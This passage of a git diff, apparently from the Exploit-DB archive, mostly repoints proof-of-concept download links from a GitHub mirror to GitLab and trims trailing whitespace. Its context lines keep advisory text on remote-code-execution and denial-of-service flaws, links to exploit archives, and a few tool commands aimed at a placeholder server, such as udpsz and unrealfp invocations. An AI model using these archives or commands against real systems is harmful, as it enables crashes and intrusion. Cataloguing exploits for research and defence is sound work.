-################################################################### - - +################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/9839.txt b/exploits/php/webapps/9839.txt index 977baae20..264de43bf 100644 --- a/exploits/php/webapps/9839.txt +++ b/exploits/php/webapps/9839.txt @@ -18,4 +18,4 @@ thenqyu : IndonesianCoder.SurabayaHackerLink.ServerIsDown.Kill-9 Don Tukulesto.KaMtiEz.Vyc0d.Arianom.Denbayan.mistersaint gonzhack.cyb3r_tr0n.m364tr0n. YogyaCarderLink.v3n0m -############################################################# +############################################################# \ No newline at end of file diff --git a/exploits/php/webapps/9840.txt b/exploits/php/webapps/9840.txt index 3459740c4..86631df42 100644 --- a/exploits/php/webapps/9840.txt +++ b/exploits/php/webapps/9840.txt @@ -18,4 +18,4 @@ thenqyu : IndonesianCoder.SurabayaHackerLink.ServerIsDown.Kill-9 Don Tukulesto.KaMtiEz.Vyc0d.Arianom.Denbayan.mistersaint gonzhack.cyb3r_tr0n.m364tr0n. YogyaCarderLink.v3n0m -############################################################# +############################################################# \ No newline at end of file diff --git a/exploits/php/webapps/9880.txt b/exploits/php/webapps/9880.txt index 7b01ef264..e5c97dade 100644 --- a/exploits/php/webapps/9880.txt +++ b/exploits/php/webapps/9880.txt @@ -19,13 +19,4 @@ # [*] Greetz: Elemento_pcx - z4i0n - D3UX - m4v3rick - HADES - Hualdo - Vympel - sp3x ! [*] Made in Brazil -[*] Reference: http://securityreason.com/exploitalert/7435 - - - - - - - - - +[*] Reference: http://securityreason.com/exploitalert/7435 \ No newline at end of file diff --git a/exploits/php/webapps/9922.txt b/exploits/php/webapps/9922.txt index a118458d2..f392a63e5 100644 --- a/exploits/php/webapps/9922.txt +++ b/exploits/php/webapps/9922.txt @@ -40,7 +40,4 @@ # - sp3x # -[0]Reference: http://securityreason.com/exploitalert/7422 - - - +[0]Reference: http://securityreason.com/exploitalert/7422 \ No newline at end of file diff --git a/exploits/python/webapps/43021.py b/exploits/python/webapps/43021.py index 34ea9e9e0..a4f8912ca 100755 --- a/exploits/python/webapps/43021.py +++ b/exploits/python/webapps/43021.py @@ -206,6 +206,4 @@ Update to 1.2.8p26. 10. REFERENCES ============= [0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/ -[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955 - - +[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955 \ No newline at end of file diff --git a/exploits/python/webapps/47879.md b/exploits/python/webapps/47879.md index 708bcf70c..20d61b3ef 100644 --- a/exploits/python/webapps/47879.md +++ b/exploits/python/webapps/47879.md @@ -1,4 +1,4 @@ -EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47879.zip +EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47879.zip # django_cve_2019_19844_poc diff --git a/exploits/solaris/dos/28911.txt b/exploits/solaris/dos/28911.txt index 3c15f902a..e5bf05e73 100644 --- a/exploits/solaris/dos/28911.txt +++ b/exploits/solaris/dos/28911.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to crash the affected computer, denying servi Solaris 10 on the ia32/x86 architecture has been reported vulnerable; previous versions may be affected as well, but Symantec has not confirmed this. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28911.img.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28911.img.gz \ No newline at end of file diff --git a/exploits/solaris/local/23874.txt b/exploits/solaris/local/23874.txt index 544ff8973..b4fcff9da 100644 --- a/exploits/solaris/local/23874.txt +++ b/exploits/solaris/local/23874.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/9962/info It has been reported that Sun Solaris may be prone to a local privilege escalation vulnerability that may allow an attacker to gain root access to a vulnerable system. The issue exists due to insufficient sanitization of user-supplied data via the vfs_getvfssw() function in the Solaris kernel. An attacker can load a user-specified kernel module by using directory traversal sequences and employing the mount() or sysfs() system calls. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23874.tar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23874.tar \ No newline at end of file diff --git a/exploits/solaris/remote/19696.c b/exploits/solaris/remote/19696.c index 58788857b..dc1bc4a59 100644 --- a/exploits/solaris/remote/19696.c +++ b/exploits/solaris/remote/19696.c @@ -107,4 +107,4 @@ int aux; free(buf); -} +} \ No newline at end of file diff --git a/exploits/solaris/remote/21097.txt b/exploits/solaris/remote/21097.txt index 313af9b76..5e9cf440e 100644 --- a/exploits/solaris/remote/21097.txt +++ b/exploits/solaris/remote/21097.txt @@ -12,4 +12,4 @@ This vulnerability is very similar to one mentioned in NAI advisory NAI-0020. NOTE: It has been reported that a valid printer does NOT need to be configured to exploit this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21097.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21097.tar.gz \ No newline at end of file diff --git a/exploits/solaris/remote/5282.txt b/exploits/solaris/remote/5282.txt index 2f99aad2a..f5ab9a64e 100644 --- a/exploits/solaris/remote/5282.txt +++ b/exploits/solaris/remote/5282.txt @@ -1,5 +1,5 @@ Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5282.tar.gz (2008-ypk2008.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5282.tar.gz (2008-ypk2008.tar.gz) # milw0rm.com [2008-03-20] \ No newline at end of file diff --git a/exploits/unix/dos/20376.txt b/exploits/unix/dos/20376.txt index 1d1856123..ce6889135 100644 --- a/exploits/unix/dos/20376.txt +++ b/exploits/unix/dos/20376.txt @@ -12,4 +12,4 @@ Because it allows a malicious local user to register rpc programs on the server, Note that, in addition to the platforms listed as vulnerable, others have not been test and may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20376.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20376.tgz \ No newline at end of file diff --git a/exploits/unix/local/19904.txt b/exploits/unix/local/19904.txt index d704eeeb8..78d940b61 100644 --- a/exploits/unix/local/19904.txt +++ b/exploits/unix/local/19904.txt @@ -5,4 +5,4 @@ This password, which grants access to the 'wizard' mode of the device, is derive This password can be utilized from the admin console locally (via a serial interface) or remotely if the machine has been deployed with a modem for remote access. With this password an intruder gains shell access to the underlying UNIX system and may sniff traffic, among other things. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19904.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19904.tar.gz \ No newline at end of file diff --git a/exploits/unix/remote/19722.txt b/exploits/unix/remote/19722.txt index a5dba77aa..993b8a99e 100644 --- a/exploits/unix/remote/19722.txt +++ b/exploits/unix/remote/19722.txt @@ -8,4 +8,4 @@ It is also possible for a local user to pass arguments to sendmail, through the By exploiting multiple vulnerabilities in lpd, it may be possible for a remote attacker to gain root privileges on a target server. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19722.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19722.tgz \ No newline at end of file diff --git a/exploits/unix/remote/20512.txt b/exploits/unix/remote/20512.txt index 69405819b..4c3b47cd1 100644 --- a/exploits/unix/remote/20512.txt +++ b/exploits/unix/remote/20512.txt @@ -14,4 +14,4 @@ This vulnerability can be exploited on systems supporting anonymous ftp if a wri It should noted that OpenBSD ships with ftp disabled, though it is an extremely commonly used service. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20512.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20512.tar.gz \ No newline at end of file diff --git a/exploits/unix/remote/20879.txt b/exploits/unix/remote/20879.txt index 2984f2106..f87e523c5 100644 --- a/exploits/unix/remote/20879.txt +++ b/exploits/unix/remote/20879.txt @@ -4,4 +4,4 @@ The rpc.yppasswdd server is used to handle password change requests from yppassw A buffer overrun vulnerability has been discovered in the rpc.yppasswdd utility distributed by multiple vendors. The problem occurs due to insufficient bounds checking before copying remotely-supplied user information into a static memory buffer. As a result, a malicious user may be capable of exploiting this issue to overwrite sensitive locations in memory and thus execute arbitrary code with superuser privileges. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20879.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20879.tar.gz \ No newline at end of file diff --git a/exploits/unix/remote/21314.txt b/exploits/unix/remote/21314.txt index b43563c0a..0bf621781 100644 --- a/exploits/unix/remote/21314.txt +++ b/exploits/unix/remote/21314.txt @@ -6,4 +6,4 @@ A vulnerability has been announced in some versions of OpenSSH. An off-by-one er Administrators should assume that this can be exploited without authentication and should patch vulnerable versions immediately. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21314.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21314.tgz \ No newline at end of file diff --git a/exploits/unix/remote/21574.txt b/exploits/unix/remote/21574.txt index 40cc90d43..0b9c64566 100644 --- a/exploits/unix/remote/21574.txt +++ b/exploits/unix/remote/21574.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/5079/info Pirch is subject to a buffer overflow condition. The overrun occurs if a user receives on a maliciously constructed link. It is not confirmed whether the user must first click on the link or not. This issue is the result of inadequate bounds checking on externally supplied data. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21574.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21574.zip \ No newline at end of file diff --git a/exploits/unix/remote/21579.txt b/exploits/unix/remote/21579.txt index 68d08cfdf..80658921a 100644 --- a/exploits/unix/remote/21579.txt +++ b/exploits/unix/remote/21579.txt @@ -15,4 +15,4 @@ Proof-of-concept code has been made public. Users are advised to upgrade immedia **UPDATE: One of these issues is trivially exploitable and is still present in OpenSSH 3.5p1 and 3.4p1. Although these reports have not been confirmed, administrators are advised to implement the OpenSSH privilege-separation feature as a workaround. BSD administrators are also advised to upgrade to the newest kernel versions because recently patched vulnerabilities may allow root compromise despite the use of the privilege-separation feature. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21579.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21579.tar.gz \ No newline at end of file diff --git a/exploits/unix/remote/22085.txt b/exploits/unix/remote/22085.txt index df6b28499..b22894347 100644 --- a/exploits/unix/remote/22085.txt +++ b/exploits/unix/remote/22085.txt @@ -6,4 +6,4 @@ Due to a lack of sufficient bounds checking for client responses to password aut It is believed the attacker must be able to issue a COM_CHANGE_USER command to exploit this issue, so having access to a valid database user account may be a prerequisite for exploitation. It is not known if this condition exists when an unauthenticated user attempts to authenticate normally. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22085.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22085.tgz \ No newline at end of file diff --git a/exploits/unix/remote/22471.txt b/exploits/unix/remote/22471.txt index 8833c99d4..44e22c72f 100644 --- a/exploits/unix/remote/22471.txt +++ b/exploits/unix/remote/22471.txt @@ -6,4 +6,4 @@ Successful exploitation of this issue could allow an attacker to execute arbitra It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22471.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22471.tar.gz \ No newline at end of file diff --git a/exploits/unix/remote/24067.c b/exploits/unix/remote/24067.c index 2d4debdf0..262b13dde 100644 --- a/exploits/unix/remote/24067.c +++ b/exploits/unix/remote/24067.c @@ -159,8 +159,4 @@ int main(int argc, char *argv[]) } -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24067.lha - - - - +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24067.lha \ No newline at end of file diff --git a/exploits/unix/remote/25625.c b/exploits/unix/remote/25625.c index 8e5909c6e..5b8f15fa8 100644 --- a/exploits/unix/remote/25625.c +++ b/exploits/unix/remote/25625.c @@ -119,7 +119,4 @@ void changeport(char *code, int port, int offset) { /* Assume Little-Endianess.... */ *ptr++=(char)((port>>8)&0xff); *ptr++=(char)(port&0xff); -} - - - +} \ No newline at end of file diff --git a/exploits/unix/remote/27992.txt b/exploits/unix/remote/27992.txt index 44841bc62..749ab5115 100644 --- a/exploits/unix/remote/27992.txt +++ b/exploits/unix/remote/27992.txt @@ -6,4 +6,4 @@ This issue allows remote attackers to execute arbitrary machine code in the cont FreeType versions prior to 2.2.1 are vulnerable to this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27992.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27992.zip \ No newline at end of file diff --git a/exploits/unix/remote/32811.txt b/exploits/unix/remote/32811.txt index f386011c4..7543eebe5 100644 --- a/exploits/unix/remote/32811.txt +++ b/exploits/unix/remote/32811.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary code with the privileges Versions prior to Flash Player 10.0.12.36 are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32811.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32811.rar \ No newline at end of file diff --git a/exploits/unix/remote/40347.txt b/exploits/unix/remote/40347.txt index 960b376a6..6c6c88e67 100644 --- a/exploits/unix/remote/40347.txt +++ b/exploits/unix/remote/40347.txt @@ -441,4 +441,4 @@ they receive the CLIENT_HELLO packet. openssl-scanner reports this as http://www.phreedom.org/solar/exploits/apache-openssl/openssl-too-open.tar.gz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40347.tar.gz (openssl-too-open.tar.gz) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40347.tar.gz (openssl-too-open.tar.gz) \ No newline at end of file diff --git a/exploits/watchos/dos/47158.txt b/exploits/watchos/dos/47158.txt index 968f3f689..3dcc481b4 100644 --- a/exploits/watchos/dos/47158.txt +++ b/exploits/watchos/dos/47158.txt @@ -15,4 +15,4 @@ I've also attached a crash dump and ETencode.m, which is the file that was used Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47158.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47158.zip \ No newline at end of file diff --git a/exploits/windows/dos/10204.txt b/exploits/windows/dos/10204.txt index fc8491605..9eb7b258d 100644 --- a/exploits/windows/dos/10204.txt +++ b/exploits/windows/dos/10204.txt @@ -14,4 +14,4 @@ Foxit Reader is prone to a remote code-execution vulnerability because is fails An attacker can exploit this issue by supplying a malicious PDF file or webpage. Successful exploits may allow the attacker to execute arbitrary code in the context of a user running the affected application. Failed attempts will likely result in denial-of-service conditions. -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10204.tar (2009-11-22-36668.tar) \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/10204.tar (2009-11-22-36668.tar) \ No newline at end of file diff --git a/exploits/windows/dos/10208.txt b/exploits/windows/dos/10208.txt index 128ae5cac..415c2c0a3 100644 --- a/exploits/windows/dos/10208.txt +++ b/exploits/windows/dos/10208.txt @@ -2,4 +2,4 @@ Adobe Reader and Acrobat 9.x before 9.2, 8.x before 8.1.7, and possibly 7.x thro attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10208.tgz (2009-11-22-memcorrupt.tgz) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/10208.tgz (2009-11-22-memcorrupt.tgz) \ No newline at end of file diff --git a/exploits/windows/dos/10343.txt b/exploits/windows/dos/10343.txt index 65d54bcee..b55ef80ef 100644 --- a/exploits/windows/dos/10343.txt +++ b/exploits/windows/dos/10343.txt @@ -101,10 +101,10 @@ Some malicious user can use is to create a DoS condition on a server or workstat The PoC Files can be download here. Hang CPU -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10343-1.arj (PRL_CPU_Hang.arj) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/10343-1.arj (PRL_CPU_Hang.arj) Crash Application -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10343-2.cab (PRL_Crash.cab) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/10343-2.cab (PRL_Crash.cab) ##################################################################################### diff --git a/exploits/windows/dos/11062.txt b/exploits/windows/dos/11062.txt index 6f4a9cec3..46cc8a92a 100644 --- a/exploits/windows/dos/11062.txt +++ b/exploits/windows/dos/11062.txt @@ -5,4 +5,4 @@ # Code : -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11062.zip (sopcast_exp.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11062.zip (sopcast_exp.zip) \ No newline at end of file diff --git a/exploits/windows/dos/11064.txt b/exploits/windows/dos/11064.txt index 542fd9cf3..31edaf162 100644 --- a/exploits/windows/dos/11064.txt +++ b/exploits/windows/dos/11064.txt @@ -4,4 +4,4 @@ # Tested on: xpsp3 ie6 # Code : -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11064.zip (uusee.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11064.zip (uusee.zip) \ No newline at end of file diff --git a/exploits/windows/dos/11149.c b/exploits/windows/dos/11149.c index 7d055d586..35e007d98 100644 --- a/exploits/windows/dos/11149.c +++ b/exploits/windows/dos/11149.c @@ -96,4 +96,4 @@ void print(char* msg) { printf("\n[*]%s\n",msg); - } + } \ No newline at end of file diff --git a/exploits/windows/dos/11176.txt b/exploits/windows/dos/11176.txt index 2da66e67a..1c3877ff2 100644 --- a/exploits/windows/dos/11176.txt +++ b/exploits/windows/dos/11176.txt @@ -5,4 +5,4 @@ # I exposed this vunl two weeks ago,are you really responsible for # the security of millions users? # Code : -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11176.zip (Xunlei_XPPlayer_ActiveX_Remote_Exec_0day_POC.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11176.zip (Xunlei_XPPlayer_ActiveX_Remote_Exec_0day_POC.zip) \ No newline at end of file diff --git a/exploits/windows/dos/11182.txt b/exploits/windows/dos/11182.txt index 4f89b812c..5ad0db536 100644 --- a/exploits/windows/dos/11182.txt +++ b/exploits/windows/dos/11182.txt @@ -1,7 +1,7 @@ # Version: 6/7/8 # Tested on: Windows XP SP3 English & Windows 7 # CVE : -# Code: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11182.tar.gz (ie_crash.tar.gz) +# Code: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11182.tar.gz (ie_crash.tar.gz) Description: Modified 1360. byte to 44, 1361. to 43, 1362. 42, 1363. byte to 41 of a sample swf file, ran it and crash occurred. diff --git a/exploits/windows/dos/11192.txt b/exploits/windows/dos/11192.txt index bee724c42..8b7056956 100644 --- a/exploits/windows/dos/11192.txt +++ b/exploits/windows/dos/11192.txt @@ -20,7 +20,7 @@ Opening a malformed ".slk" file with Openoffice, causes a crash on PoC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11192.rar (slk.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11192.rar (slk.rar) Credits: karak0rsan and murderkey from Hellcode Research diff --git a/exploits/windows/dos/11245.txt b/exploits/windows/dos/11245.txt index ea631487c..323ade649 100644 --- a/exploits/windows/dos/11245.txt +++ b/exploits/windows/dos/11245.txt @@ -10,4 +10,4 @@ This same bug was in early version of firfox,found by (Wojciech Pawlikowski) Thi This vulnerability cause a denial of service (memory corruption) via an XML document composed of a long series of start-tags with no corresponding end-tags. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11245.rar (Firefox-v3.6_PoC.rar) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11245.rar (Firefox-v3.6_PoC.rar) \ No newline at end of file diff --git a/exploits/windows/dos/11247.txt b/exploits/windows/dos/11247.txt index 801600e67..b42673959 100644 --- a/exploits/windows/dos/11247.txt +++ b/exploits/windows/dos/11247.txt @@ -9,4 +9,4 @@ after opening the opera.html broswer hang for a while and crush.same bug in fire This vulnerability cause a denial of service (memory corruption) via an XML document composed of a long series of start-tags with no corresponding end-tags. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11247.rar (Opera_10.10-PoC.rar) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11247.rar (Opera_10.10-PoC.rar) \ No newline at end of file diff --git a/exploits/windows/dos/11342.txt b/exploits/windows/dos/11342.txt index 92735a48c..f29bf4e31 100644 --- a/exploits/windows/dos/11342.txt +++ b/exploits/windows/dos/11342.txt @@ -3,4 +3,4 @@ # Tested on: Windows XP SP2/SP3 (x86), Vista (x86), Windows 7 (x64) # Code : A specially crafted SQL file query can cause the the application to freeze and finally crash. The bug is the SQL query processor engine, it can't handle malformed SQL queries leading to crash. -# PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11342.tar.gz (sqlite_browser_db_poc.tar.gz) \ No newline at end of file +# PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11342.tar.gz (sqlite_browser_db_poc.tar.gz) \ No newline at end of file diff --git a/exploits/windows/dos/11632.txt b/exploits/windows/dos/11632.txt index cf3c4e7a1..1fd1e79a4 100644 --- a/exploits/windows/dos/11632.txt +++ b/exploits/windows/dos/11632.txt @@ -1,7 +1,7 @@ When Orb is first installed it registers several Direct Show filters with the system. When registered these filters are then called whenever a file which has a dependency on such a required filter is accessed. By specially crafting specific headers embedded into an mp3 file we can create a direct code path to code which is vulnerable to a integer division by zero. This vulnerability can be triggered remotely be embedding the crafted mp3 file into HTML. It is also not dependent on a certain media player. Attached is a PoC (Proof-Of-Concept) I wrote for this specific bug. Also included is a Rebuild file for IDA Pro examining the crash. Download POC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11632.zip (aac_parser_int_div_by_0_orb.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11632.zip (aac_parser_int_div_by_0_orb.zip) Timeline: diff --git a/exploits/windows/dos/11639.txt b/exploits/windows/dos/11639.txt index b4d8b11bf..52c94b27b 100644 --- a/exploits/windows/dos/11639.txt +++ b/exploits/windows/dos/11639.txt @@ -14,4 +14,4 @@ Chrome will through up the "Aw, Snap!" Know your enemy -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11639.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11639.zip \ No newline at end of file diff --git a/exploits/windows/dos/11803.txt b/exploits/windows/dos/11803.txt index fe89177c2..cceccb3cc 100644 --- a/exploits/windows/dos/11803.txt +++ b/exploits/windows/dos/11803.txt @@ -5,7 +5,7 @@ Successful exploitation of this vulnerability allows an attacker to execute arbi This vulnerability is confirmed in Crimson Editor version 3.70. A PoC configuration file can be downloaded here: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11803.zip (cedt.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11803.zip (cedt.zip) Ref: diff --git a/exploits/windows/dos/12080.txt b/exploits/windows/dos/12080.txt index cfd8ddf81..239679868 100644 --- a/exploits/windows/dos/12080.txt +++ b/exploits/windows/dos/12080.txt @@ -19,7 +19,7 @@ DoS("DoS"); ------------------------- -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12080.pdf +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12080.pdf Regards diff --git a/exploits/windows/dos/13872.txt b/exploits/windows/dos/13872.txt index dfeef568a..5e52076f2 100644 --- a/exploits/windows/dos/13872.txt +++ b/exploits/windows/dos/13872.txt @@ -7,4 +7,4 @@ Code was generated utilizing a custom fuzzer, PoC creates an Access Violation when writing to memory. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13872.pdf (SumatraPDF1.1DOS.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13872.pdf (SumatraPDF1.1DOS.pdf) \ No newline at end of file diff --git a/exploits/windows/dos/13887.c b/exploits/windows/dos/13887.c index fefee38e8..9b9a32bc5 100644 --- a/exploits/windows/dos/13887.c +++ b/exploits/windows/dos/13887.c @@ -260,4 +260,4 @@ } void copy_str(i8* v,i8* w,i32 len){ memcpy(v, w, len); - } + } \ No newline at end of file diff --git a/exploits/windows/dos/13888.c b/exploits/windows/dos/13888.c index 227f16a48..f34ea1102 100644 --- a/exploits/windows/dos/13888.c +++ b/exploits/windows/dos/13888.c @@ -165,5 +165,4 @@ void error_handle(void){ perror("\nError"); exit(1); - } - + } \ No newline at end of file diff --git a/exploits/windows/dos/13919.c b/exploits/windows/dos/13919.c index f55410799..ec69632bd 100644 --- a/exploits/windows/dos/13919.c +++ b/exploits/windows/dos/13919.c @@ -1615,4 +1615,4 @@ void error_handle(){ perror("\nError"); exit(1); - } + } \ No newline at end of file diff --git a/exploits/windows/dos/13959.txt b/exploits/windows/dos/13959.txt index 800174878..82ea67d2e 100644 --- a/exploits/windows/dos/13959.txt +++ b/exploits/windows/dos/13959.txt @@ -225,7 +225,7 @@ cause a crash of the server: http://aluigi.org/poc/teamspeakrack.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13959.zip (teamspeakrack.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13959.zip (teamspeakrack.zip) ####################################################################### diff --git a/exploits/windows/dos/14286.txt b/exploits/windows/dos/14286.txt index a2f34f1a7..e747ba7c7 100644 --- a/exploits/windows/dos/14286.txt +++ b/exploits/windows/dos/14286.txt @@ -84,7 +84,7 @@ invalid memory accesses. http://aluigi.org/testz/udpsz.zip or -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14286.zip (grawpoc.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14286.zip (grawpoc.zip) A] udpsz -C "0100 13 0003 0000 ffffffff" -b 0x41 SERVER 16250 3000 diff --git a/exploits/windows/dos/14346.txt b/exploits/windows/dos/14346.txt index dbabfc6e1..d6366e294 100644 --- a/exploits/windows/dos/14346.txt +++ b/exploits/windows/dos/14346.txt @@ -33,4 +33,4 @@ - PoC: http://www.zeroscience.mk/codes/zsl_poc17.shw.rar or -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14346.rar (zsl_poc17.shw.rar) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14346.rar (zsl_poc17.shw.rar) \ No newline at end of file diff --git a/exploits/windows/dos/14349.html b/exploits/windows/dos/14349.html index f0dd31a73..389789669 100644 --- a/exploits/windows/dos/14349.html +++ b/exploits/windows/dos/14349.html @@ -28,7 +28,4 @@ ctx.getImageData(0,0,0x20000,0x20000); Original Advisory: -http://pouya.info/blog/userfiles/vul/OperaCC.pdf - - - +http://pouya.info/blog/userfiles/vul/OperaCC.pdf \ No newline at end of file diff --git a/exploits/windows/dos/14414.txt b/exploits/windows/dos/14414.txt index cc268b337..dd7df985b 100644 --- a/exploits/windows/dos/14414.txt +++ b/exploits/windows/dos/14414.txt @@ -64,7 +64,7 @@ are no limitations. http://aluigi.org/fakep/unrealfp.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14414.zip (unrealfp.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14414.zip (unrealfp.zip) unrealfp -x 2 -c "STEAMBLOB B=" SERVER PORT diff --git a/exploits/windows/dos/14424.txt b/exploits/windows/dos/14424.txt index e98895fe7..39313730f 100644 --- a/exploits/windows/dos/14424.txt +++ b/exploits/windows/dos/14424.txt @@ -74,7 +74,7 @@ No other technical details are available at the moment. http://aluigi.org/poc/fearless.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14424.zip (fearless.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14424.zip (fearless.zip) tuned to work with the F.E.A.R. series, so Project 